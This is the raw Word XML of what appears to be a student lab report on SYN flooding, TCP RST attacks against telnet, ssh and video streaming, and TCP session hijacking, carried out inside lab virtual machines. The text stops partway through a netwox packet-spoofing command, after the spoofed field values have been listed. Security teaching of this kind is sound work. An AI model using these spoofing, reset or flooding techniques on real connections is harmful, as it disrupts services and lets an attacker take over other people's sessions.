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56E48" w14:textId="77777777" w:rsidR="00CF4255" w:rsidRDefault="006A11DB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Task </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> SYN Flooding Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29447582" w14:textId="57304317" w:rsidR="006A11DB" w:rsidRDefault="006A11DB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="058BF564" wp14:editId="2FBBEAED">
            <wp:extent cx="5731510" cy="1166495"/>
            <wp:effectExtent l="0" t="0" r="0"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1166495"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="718A9DA6" w14:textId="7E7C1AD7" w:rsidR="006A11DB" w:rsidRDefault="006A11DB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Initially the syn cookies is turned on, when I try the SYN Flooding attack, it will only capture the request slowly which means it will not occupy the whole queue of the half-connection queue. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1EB29F" w14:textId="675F63B6" w:rsidR="006A11DB" w:rsidRDefault="006A11DB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35673798" wp14:editId="3391470C">
            <wp:extent cx="5731510" cy="312483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51811A7A" w14:textId="239C2A10" w:rsidR="006A11DB" w:rsidRDefault="006A11DB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39066A6D" w14:textId="462D9D6E" w:rsidR="006A11DB" w:rsidRDefault="006A11DB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EFD69E3" w14:textId="77777777" w:rsidR="006A11DB" w:rsidRDefault="006A11DB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52263F8E" w14:textId="2BB56A11" w:rsidR="006A11DB" w:rsidRDefault="006A11DB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CDF0400" wp14:editId="6277DF11">
            <wp:extent cx="5731510" cy="105981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059815"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B2CE50" w14:textId="322AFB7C" w:rsidR="006A11DB" w:rsidRDefault="006A11DB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>However, when I turned off the syn cookies, I am able to succeed the SYN flooding attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FEA23C" w14:textId="27CA0DE7" w:rsidR="006A11DB" w:rsidRDefault="006A11DB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3081BC79" wp14:editId="2B9C5733">
            <wp:extent cx="5731510" cy="322643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0D84309C" w14:textId="3AD41D01" w:rsidR="006A11DB" w:rsidRDefault="006A11DB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The queue is full </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> SYN_RECV connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76698CA5" w14:textId="4A459B9D" w:rsidR="006A11DB" w:rsidRDefault="006A11DB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B6FB1AC" w14:textId="58FD65EF" w:rsidR="006A11DB" w:rsidRDefault="006A11DB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Task </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> TCP RST Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3C7046" w14:textId="6C50E05D" w:rsidR="006A11DB" w:rsidRDefault="006A11DB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>On telnet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BC4439" w14:textId="34ADD268" w:rsidR="006A11DB" w:rsidRDefault="006A11DB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Firstly, I set up telnet connection between 10.0.2.4 and 10.0.2.5.  Then I run the code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C031669" w14:textId="0B6DA624" w:rsidR="006A11DB" w:rsidRDefault="006A11DB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B06214A" wp14:editId="760B65A6">
            <wp:extent cx="5731510" cy="654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654050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="088B7C10" w14:textId="52B0B359" w:rsidR="006A11DB" w:rsidRDefault="006A11DB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>After the attack, the connection between the 10.0.2.4 and 10.0.2.5 is broken.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDD5058" w14:textId="534281F2" w:rsidR="006A11DB" w:rsidRDefault="006A11DB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43CC294E" wp14:editId="7244C4E5">
            <wp:extent cx="5731510" cy="78486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inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="39800B63" w14:textId="1FCE7F92" w:rsidR="006A11DB" w:rsidRDefault="006A11DB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5000C214" w14:textId="48226264" w:rsidR="006A11DB" w:rsidRDefault="006A11DB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A256A19" w14:textId="4B69B936" w:rsidR="006A11DB" w:rsidRDefault="006A11DB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">On </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C3BD94" w14:textId="77777777" w:rsidR="006A11DB" w:rsidRDefault="006A11DB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Firstly, I establish a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> connection between the 10.0.2.4 and 10.0.2.5 by using </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F33212" w14:textId="780B4D71" w:rsidR="006A11DB" w:rsidRDefault="006A11DB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> seed@10.0.2.5” before I do the TCP reset attack, I am able to establish the connection, however, after I did the attack, the connection is broken.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C763AD8" w14:textId="77777777" w:rsidR="006A11DB" w:rsidRDefault="006A11DB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D7044F9" w14:textId="64A6CDA7" w:rsidR="006A11DB" w:rsidRDefault="006A11DB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E881799" wp14:editId="3B3EECB2">
            <wp:extent cx="5731510" cy="589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89915"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2C6531" w14:textId="55A59376" w:rsidR="006A11DB" w:rsidRDefault="006A11DB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Moreover, when I trying to establish the connection again while </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attacking,  I</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> am not able to establish it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1708E2" w14:textId="6C40D832" w:rsidR="006A11DB" w:rsidRDefault="006A11DB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EDE9C23" wp14:editId="3A1FAD1C">
            <wp:extent cx="5731510" cy="564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64515"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB2EBE1" w14:textId="78C823E4" w:rsidR="006A11DB" w:rsidRDefault="006A11DB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>But after I stop the attack, I am able to establish the connection again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3115E601" w14:textId="214D6ED8" w:rsidR="00C033B9" w:rsidRDefault="00C033B9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C033B9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">By using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C033B9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>scapy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A21655" w14:textId="53744CCD" w:rsidR="00C033B9" w:rsidRDefault="00C033B9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB3411F" w14:textId="0E0CED12" w:rsidR="00C033B9" w:rsidRDefault="00C033B9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62E42E95" wp14:editId="49B3B3FE">
            <wp:extent cx="5731510" cy="396303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63035"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EF7E31" w14:textId="0919AB2E" w:rsidR="00C033B9" w:rsidRDefault="00C033B9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C8C19A" w14:textId="0269799E" w:rsidR="00C033B9" w:rsidRPr="00C033B9" w:rsidRDefault="00C033B9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="236B48D7" wp14:editId="23A124CE">
            <wp:extent cx="5731510" cy="4311650"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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311650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D4D843" w14:textId="5F305BC9" w:rsidR="006A11DB" w:rsidRDefault="006A11DB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Task 3</w:t>
      </w:r>
      <w:r w:rsidR="002D2FC4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: TCP RST attack on video streaming application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3E180B" w14:textId="6B398559" w:rsidR="002D2FC4" w:rsidRDefault="002D2FC4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">I open a YouTube video on VM 10.0.2.4. Initially, the video stream is played smoothly. However, after I establish the RST attack on another VM 10.0.2.6, the video is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>stucked</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15BC1412" wp14:editId="2B36F59B">
            <wp:extent cx="5731510" cy="4298950"/>
            <wp:effectExtent l="0" t="0" r="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8BD9B06" w14:textId="25BE569D" w:rsidR="002D2FC4" w:rsidRDefault="002D2FC4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120D8F98" w14:textId="25743687" w:rsidR="002D2FC4" w:rsidRDefault="002D2FC4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F673977" wp14:editId="4C3F2087">
            <wp:extent cx="3868514" cy="2901600"/>
            <wp:effectExtent l="0" t="0" r="508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71329" cy="2903711"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="765CA385" w14:textId="5AFA1449" w:rsidR="00715936" w:rsidRDefault="00715936">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B802A07" w14:textId="77777777" w:rsidR="00715936" w:rsidRDefault="00715936" w:rsidP="00715936">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Task 4: TCP Session Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED913ED" w14:textId="77777777" w:rsidR="00715936" w:rsidRDefault="00715936" w:rsidP="00715936"/>
    <w:p w14:paraId="18DE4C95" w14:textId="2E5A2B93" w:rsidR="00715936" w:rsidRDefault="00715936" w:rsidP="00715936">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">First, we set up 3 Virtual Machines: a Client(10.0.2.7), Server(10.0.2.8) and Attacker(10.0.2.9).  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232CAFBF" w14:textId="77777777" w:rsidR="00715936" w:rsidRDefault="00715936" w:rsidP="00715936">
      <w:r>
        <w:t>Then we telnet to the Server from the Client to establish a connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045EEE09" w14:textId="2D1D79F1" w:rsidR="00715936" w:rsidRDefault="00715936" w:rsidP="00715936">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>$ telnet 10.0.2.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DE72DC" w14:textId="77777777" w:rsidR="00715936" w:rsidRDefault="00715936" w:rsidP="00715936"/>
    <w:p w14:paraId="18E9467A" w14:textId="34481E2D" w:rsidR="00715936" w:rsidRDefault="00715936" w:rsidP="00715936">
      <w:r>
        <w:t xml:space="preserve">We use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to figure out what values we should put into each field of our spoofed packets. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2381DBAA" w14:textId="0D449CF0" w:rsidR="00715936" w:rsidRDefault="00715936" w:rsidP="00715936">
      <w:r>
        <w:t xml:space="preserve">we can obtain the following information from the last file captured by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D4DC27" w14:textId="2D0EB2EE" w:rsidR="00715936" w:rsidRDefault="00715936" w:rsidP="00715936">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>--ip4-src 10.0.2.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C4D967" w14:textId="5796A24E" w:rsidR="00715936" w:rsidRDefault="00715936" w:rsidP="00715936">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>--ip4-dst 10.0.2.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D53F26" w14:textId="7E86377A" w:rsidR="00715936" w:rsidRDefault="00715936" w:rsidP="00715936">
      <w:pPr>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tcp-src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> 46864</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E482E0" w14:textId="77777777" w:rsidR="00715936" w:rsidRDefault="00715936" w:rsidP="00715936">
      <w:pPr>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tcp-dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> 23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7D9EB2" w14:textId="4343526D" w:rsidR="00715936" w:rsidRDefault="00715936" w:rsidP="00715936">
      <w:pPr>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tcp-seqnum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3680996384</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743DEBE7" w14:textId="36E15A0D" w:rsidR="00715936" w:rsidRDefault="00715936" w:rsidP="00715936">
      <w:pPr>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tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>-window 245</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068FE393" w14:textId="7434C018" w:rsidR="00715936" w:rsidRDefault="00715936" w:rsidP="00715936">
      <w:pPr>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tcp-acknum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1899252344</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591A2C2F" w14:textId="65E71552" w:rsidR="00715936" w:rsidRDefault="00715936" w:rsidP="00715936">
      <w:pPr>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tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">-data </w:t>
      </w:r>
      <w:r w:rsidRPr="00715936">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>5368616e675a6577656e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1DE03D" w14:textId="77777777" w:rsidR="00715936" w:rsidRDefault="00715936" w:rsidP="00715936"/>
    <w:p w14:paraId="013063D9" w14:textId="77777777" w:rsidR="00715936" w:rsidRDefault="00715936" w:rsidP="00715936">
      <w:r>
        <w:t>Now we can put together our packet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38732D96" w14:textId="5EB92E77" w:rsidR="00715936" w:rsidRDefault="00715936" w:rsidP="00715936">
      <w:pPr>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sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>netwox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> 40 --ip4-src 10.0.2.7 --ip4-dst 10.0.2.8 --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
